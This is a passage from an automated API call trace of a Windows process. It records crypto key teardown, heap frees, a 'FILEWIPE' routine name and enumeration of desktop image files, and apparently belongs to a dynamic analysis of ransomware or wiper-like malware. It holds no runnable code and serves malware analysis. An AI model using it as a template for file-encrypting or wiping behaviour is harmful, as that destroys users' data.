Size=0x4) returned 0x6bb578 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.157] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.157] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.158] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.158] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.158] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.158] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.158] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.158] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.158] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.158] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.158] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.163] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.165] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.165] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.170] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.170] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.170] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.170] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.170] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0076.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.170] CryptDestroyKey (hKey=0x6b8ab8) returned 1 [0076.172] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.172] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.172] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.172] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.172] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.172] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.173] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.173] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.173] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.173] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.173] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0076.173] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.173] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.173] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.173] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.173] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.173] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.173] CryptReleaseContext (hProv=0x6969c0, dwFlags=0x0) returned 1 [0076.174] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.174] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.174] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.174] FreeLibrary (hLibModule=0x77710000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0076.174] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0076.174] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.174] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0076.174] CloseHandle (hObject=0x128) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0076.174] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0076.175] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.175] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.175] CloseHandle (hObject=0x140) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0076.178] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0076.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.182] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.183] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1b20 | out: hHeap=0x650000) returned 1 [0076.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0076.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0076.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.184] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.184] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0076.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.185] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.185] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f5bqoll3uym0camplpj.jpg")) returned 0x20 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.185] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.185] FindFirstFileW (in: 